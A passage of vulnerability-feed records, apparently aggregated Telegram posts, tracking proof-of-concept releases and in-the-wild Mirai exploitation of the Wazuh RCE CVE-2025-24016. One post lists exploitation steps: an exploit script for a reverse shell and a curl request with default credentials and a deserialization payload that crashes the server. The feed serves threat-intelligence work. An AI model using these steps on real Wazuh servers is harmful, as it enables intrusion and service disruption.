\n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-24016: RCE in Wazuh server!  Remote Code Execution \nURL\uff1ahttps://github.com/MuhammadWaseem29/CVE-2025-24016\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-02-21T00:26:52.000000Z"}, {"uuid": "f9effdba-1473-4099-b5ab-022eedb0bcbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24012", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2418", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24012\n\ud83d\udd39 Description: Umbraco is a free and open source .NET content management system. Starting in version 14.0.0 and prior to versions 14.3.2 and 15.1.2, authenticated users are able to exploit a cross-site scripting vulnerability when viewing certain localized backoffice components. Versions 14.3.2 and 15.1.2 contain a patch.\n\ud83d\udccf Published: 2025-01-21T15:32:43.910Z\n\ud83d\udccf Modified: 2025-01-21T15:32:43.910Z\n\ud83d\udd17 References:\n1. https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-wv8v-rmw2-25wc\n2. https://github.com/umbraco/Umbraco-CMS/commit/d4f8754f933895b3a329296e25ddea6f84a0aea2", "creation_timestamp": "2025-01-21T16:00:42.000000Z"}, {"uuid": "8b7c0099-6f81-4284-ae00-00f3998656a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/13654", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-24016\nURL\uff1ahttps://github.com/0xjessie21/CVE-2025-24016\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-02-16T11:04:36.000000Z"}, {"uuid": "90580ea5-15a7-4c9b-8312-cc5a9e3d5992", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2401", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7758", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2401\n\ud83d\udd25 CVSS Score: 5.4 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Buffer overflow vulnerability in Immunity Debugger affecting version 1.85, its exploitation could allow a local attacker to execute arbitrary code, due to the lack of proper boundary checking.\n\ud83d\udccf Published: 2025-03-17T12:23:28.435Z\n\ud83d\udccf Modified: 2025-03-17T12:23:28.435Z\n\ud83d\udd17 References:\n1. https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-immunity-debugger", "creation_timestamp": "2025-03-17T12:47:35.000000Z"}, {"uuid": "9270464d-86dc-4633-b91f-6e2d72182c9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/33440", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-30567 - WordPress WP01 < Path traversal\nURL\uff1ahttps://github.com/cybersecplayground/CVE-2025-24016-Wazuh-Remote-Code-Execution-RCE---PoC\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-21T19:16:43.000000Z"}, {"uuid": "4b21b2d5-bd74-4dd3-9548-ecf09a0cf4b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/43945", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aWazuh 8.4 CVE-2025-24016\nURL\uff1ahttps://github.com/guinea-offensive-security/Wazuh-RCE\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-07-13T23:59:48.000000Z"}, {"uuid": "a4bdbf88-0411-43ec-9a41-672e61132cff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "Telegram/gIzyp5AayVdHT3smoUYr4SnZ6o-u4OES6PP_34cUd0HZWA", "content": "", "creation_timestamp": "2025-06-09T15:54:20.000000Z"}, {"uuid": "f995495c-f090-45aa-97fa-df4cda49ca42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/P0x3k_1N73LL1G3NC3/34", "content": "\u2699\ufe0f Wazuh \u2014 Unsafe Deserialization RCE (CVE-2025-24016)\n\nAn unsafe deserialization vulnerability in Wazuh servers allows remote code execution through unsanitized dictionary injection in DAPI requests/responses. If an attacker injects an unsanitized dictionary into a DAPI request or response, they can craft an unhandled exception, allowing arbitrary Python code execution.\n\n\ud83d\udd17 Source:\n https://github.com/0xjessie21/CVE-2025-24016\n\n#wazuh #deserialization #rce #cve", "creation_timestamp": "2025-02-18T10:46:04.000000Z"}, {"uuid": "7a9f318d-9c11-40f3-aa6b-a83b94d1c28b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/poxek/4812", "content": "Wazuh RCE via Unsafe Deserialization CVE-2025-24016\n#CVE@poxek #wazuh #deserialization #RCE\n\n\u0412 Wazuh-\u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 (\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0434\u043b\u044f \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0438 \u0440\u0435\u0430\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u0443\u0433\u0440\u043e\u0437\u044b) \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0435\u0439 \u0434\u0430\u043d\u043d\u044b\u0445. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0438\u0437-\u0437\u0430 \u0441\u043f\u043e\u0441\u043e\u0431\u0430 \u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u0432 DistributedAPI \u0432 \u0444\u043e\u0440\u043c\u0430\u0442\u0435 JSON \u0438 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0447\u0435\u0440\u0435\u0437 \u0444\u0443\u043d\u043a\u0446\u0438\u044e as_wazuh_object (\u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u043d\u0443\u044e \u0432 framework/wazuh/core/cluster/common.py). \u0415\u0441\u043b\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0432\u043d\u0435\u0434\u0440\u0438\u0442 \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0439 \u0441\u043b\u043e\u0432\u0430\u0440\u044c \u0432 \u0437\u0430\u043f\u0440\u043e\u0441 \u0438\u043b\u0438 \u043e\u0442\u0432\u0435\u0442 DAPI, \u044d\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u043d\u0435\u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u043e\u0433\u043e \u0438\u0441\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f (__unhandled_exc__) \u0438, \u043a\u0430\u043a \u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u0435, \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e Python-\u043a\u043e\u0434\u0430, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0434\u0438\u0441\u0442\u0430\u043d\u0446\u0438\u043e\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u0434 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435. \n\n\u27a1\ufe0f\u0423\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438\n\u041e\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 4.4.0 \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 4.9.0 (\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432 \u0432\u0435\u0440\u0441\u0438\u0438 4.9.1)\n\nPoC 1. \u042d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043d\u0430 python3\ngit clone https://github.com/0xjessie21/CVE-2025-24016.git\ncd CVE-2025-24016/\npython3 -m venv venv; source venv/bin/activate\npip install -r requirements.txt\n\u0421\u043a\u0440\u0438\u043f\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u0440\u0430\u0437\u0443 \u0441\u0434\u0435\u043b\u0430\u0442\u044c reverse shell python3 CVE-2025-24016.py -u  -i  -p \n\nPoC 2. \u0428\u0430\u0431\u043b\u043e\u043d \u0434\u043b\u044f nuclei\nwget https://raw.githubusercontent.com/huseyinstif/CVE-2025-24016-Nuclei-Template/refs/heads/main/CVE-2025-24016.yaml\n\u0422\u0430\u043c \u0435\u0441\u0442\u044c \u043f\u043e\u043c\u0435\u0442\u043a\u0430 \u0432 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0445, \u0447\u0442\u043e \u0435\u0441\u043b\u0438 \u0435\u0441\u0442\u044c \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044f, \u0442\u043e \u0440\u0430\u0441\u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u0442\u0440\u043e\u043a\u0443\n\nPoC 3. \u0420\u0443\u0447\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f\ncurl -X POST -k -u \"wazuh-wui:MyS3cr37P450r.*-\" -H \"Content-Type: application/json\" --data '{\"unhandled_exc\":{\"class\": \"exit\", \"args\": []}}' https://:55000/security/user/authenticate/run_as\n\u042d\u0442\u043e\u0442 \u0437\u0430\u043f\u0440\u043e\u0441 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u0443\u044e \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e \u0438 \u043f\u0440\u0438\u0432\u0435\u0434\u0451\u0442 \u043a \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044e \u0440\u0430\u0431\u043e\u0442\u044b \u043c\u0430\u0441\u0442\u0435\u0440-\u0441\u0435\u0440\u0432\u0435\u0440\u0430. \n\n\ud83d\udccc\u041f\u043e\u044f\u0441\u043d\u0435\u043d\u0438\u0435 \u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 Wazuh \u0422\u042b\u041a\n\n\u27a1\ufe0f\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438\n\u25aa\ufe0f\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u041f\u041e: \u041e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u0435 Wazuh \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 4.9.1 \u0438\u043b\u0438 \u0432\u044b\u0448\u0435, \u0433\u0434\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430.\n\u25aa\ufe0f\u041e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430: \u041f\u0440\u043e\u0432\u0435\u0440\u044c\u0442\u0435 \u0438 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u044c\u0442\u0435 \u0434\u043e\u0441\u0442\u0443\u043f \u043a API.\n\n\ud83c\udf1a @poxek | \ud83d\udcfa YT | \ud83d\udcfa RT | \ud83d\udcfa VK | \ud83c\udf1a \u041c\u0430\u0433\u0430\u0437\u0438\u043d \u043c\u0435\u0440\u0447\u0430", "creation_timestamp": "2025-02-18T10:47:13.000000Z"}, {"uuid": "6aaab983-4895-4b4d-aa23-3c7dcb7a82d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "https://t.me/hackyourmom/11685", "content": "\ud83d\udc7e \u0423 Mirai \u043d\u043e\u0432\u0430 \u0446\u0456\u043b\u044c \u2014 \u0441\u0435\u0440\u0432\u0435\u0440\u0438 Wazuh. \u0414\u043e\u0441\u043b\u0456\u0434\u043d\u0438\u043a\u0438 \u0437 Akamai \u0432\u0438\u044f\u0432\u0438\u043b\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u0443 \u0435\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0456\u044e \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e\u0457 \u0432\u0440\u0430\u0437\u043b\u0438\u0432\u043e\u0441\u0442\u0456 CVE-2025-24016, \u044f\u043a\u0430 \u0434\u043e\u0437\u0432\u043e\u043b\u044f\u0454 \u0432\u0438\u043a\u043e\u043d\u0443\u0432\u0430\u0442\u0438 \u0434\u043e\u0432\u0456\u043b\u044c\u043d\u0438\u0439 Python-\u043a\u043e\u0434 \u0447\u0435\u0440\u0435\u0437 API. \u041c\u0456\u0448\u0435\u043d\u044c \u2014 \u043d\u0435\u0437\u0430\u0445\u0438\u0449\u0435\u043d\u0456 \u0441\u0435\u0440\u0432\u0435\u0440\u0438 \u0437 \u0432\u0435\u0440\u0441\u0456\u044f\u043c\u0438 4.4.0\u20134.9.0 \ud83e\udd16 #cybernews", "creation_timestamp": "2025-06-10T15:19:27.000000Z"}, {"uuid": "90b94fc3-b12f-4f53-b182-9d7c4fe3043c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "https://t.me/true_secator/7122", "content": "\u0412\u0441\u043b\u0435\u0434 \u0437\u0430 \u041a\u0430\u0441\u043f\u0435\u0440\u0441\u043a\u0438\u043c\u0438 \u0437\u0430 Mirai \u043f\u0440\u0438\u043d\u044f\u043b\u0438\u0441\u044c \u0440\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b \u0438\u0437 Akamai, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u0443\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Wazuh, \u043e\u0442\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u0443\u044e \u043a\u0430\u043a CVE-2025-24016.\n\nWazuh - \u044d\u0442\u043e \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0430\u044f \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c, \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u043d\u0430\u044f \u0434\u043b\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0438 \u0440\u0435\u0430\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u0443\u0433\u0440\u043e\u0437\u044b.\n\n\u0415\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043e\u0431\u044a\u044f\u0432\u0438\u043b\u0438 10 \u0444\u0435\u0432\u0440\u0430\u043b\u044f \u043e\u0431 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0438 CVE-2025-24016, \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438, \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0443\u044e \u0441\u0435\u0440\u0432\u0435\u0440\u044b, \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0435 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u0432\u0435\u0440\u0441\u0438\u0438 4.4.0 \u0438 \u0431\u043e\u043b\u0435\u0435 \u043d\u043e\u0432\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439, \u0434\u043e 4.9.1, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435.\n\n\u041a\u0430\u043a \u043f\u043e\u044f\u0441\u043d\u044f\u044e\u0442 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438, \u043e\u0448\u0438\u0431\u043a\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 Wazuh \u0438 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043b\u044e\u0431\u044b\u043c \u0441 \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u043a API (\u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u043f\u0430\u043d\u0435\u043b\u044c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438\u043b\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u044b Wazuh \u0432 \u043a\u043b\u0430\u0441\u0442\u0435\u0440\u0435) \u0438\u043b\u0438, \u0432 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f\u0445, \u0434\u0430\u0436\u0435 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0430\u0433\u0435\u043d\u0442\u043e\u043c.\n\n\u041d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0443\u0436\u0435 \u0431\u044b\u043b \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d PoC, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0439 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c DoS-\u0430\u0442\u0430\u043a\u0438, \u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u043d\u0435\u0439 \u0441\u043f\u0443\u0441\u0442\u044f \u0432\u044b\u0448\u0435\u043b PoC, \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u043d\u044b\u0439 \u0438 \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430.\n\n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438 \u0445\u0430\u043d\u0438\u043f\u043e\u0442\u043e\u0432 Akamai, \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 in-the-wild\u00a0\u043d\u0430\u0447\u0430\u043b\u0438\u0441\u044c \u0435\u0449\u0435 \u0432 \u043c\u0430\u0440\u0442\u0435.\n\n\u0422\u043e\u0433\u0434\u0430 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0441\u0440\u0430\u0437\u0443 \u0434\u0432\u0435 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 Mirai, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0435 CVE-2025-24016 \u0434\u043b\u044f \u0432\u0437\u043b\u043e\u043c\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 Wazuh.\n\n\u041e\u0434\u0438\u043d \u0438\u0437 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432 \u0431\u043e\u0442\u043d\u0435\u0442\u0430 Mirai \u043d\u0430\u0446\u0435\u043b\u0435\u043d \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441 \u043d\u0430\u0447\u0430\u043b\u0430 \u043c\u0430\u0440\u0442\u0430, \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d \u0434\u043b\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u043b\u0443\u0436\u0438\u0442 \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u043e\u043c \u0434\u043b\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 Mirai.\n\n\u0422\u043e\u0442 \u0436\u0435 \u0431\u043e\u0442\u043d\u0435\u0442 \u0442\u0430\u043a\u0436\u0435 \u043d\u0430\u0446\u0435\u043b\u0435\u043d \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Hadoop YARN, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445 TP-Link \u0438 ZTE.\n\n\u0412\u0442\u043e\u0440\u043e\u0439 \u0448\u0442\u0430\u043c\u043c Mirai, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u044b\u0439 \u043d\u0430 CVE-2025-24016, \u0431\u044b\u043b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u043c\u0430\u044f, \u0438 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0441\u0432\u0438\u0434\u0435\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0443\u044e\u0442 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043c\u043e\u0433\u043b\u0430 \u0431\u044b\u0442\u044c \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u0430 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0438\u0442\u0430\u043b\u043e\u044f\u0437\u044b\u0447\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 Mirai \u043d\u0435\u0443\u043a\u043b\u043e\u043d\u043d\u043e \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442\u0441\u044f, \u0447\u0442\u043e \u043e\u0431\u044a\u044f\u0441\u043d\u044f\u0435\u0442\u0441\u044f \u043f\u0440\u043e\u0441\u0442\u043e\u0442\u043e\u0439 \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0441\u0442\u0430\u0440\u044b\u0445 \u0438\u0441\u0445\u043e\u0434\u043d\u0438\u043a\u043e\u0432 \u0434\u043b\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 \u0438\u043b\u0438 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043d\u043e\u0432\u044b\u0445 \u0431\u043e\u0442\u043d\u0435\u0442\u043e\u0432 \u0438 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0441\u0432\u0435\u0436\u0438\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432.\n\n\u0418\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 (IoC) - \u0432 \u043e\u0442\u0447\u0435\u0442\u0435.", "creation_timestamp": "2025-06-10T19:30:06.000000Z"}, {"uuid": "bd3c8b52-2747-4c70-b4d9-6a20ef4b8d6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "https://t.me/thehackernews/6967", "content": "A critical flaw in Wazuh Server 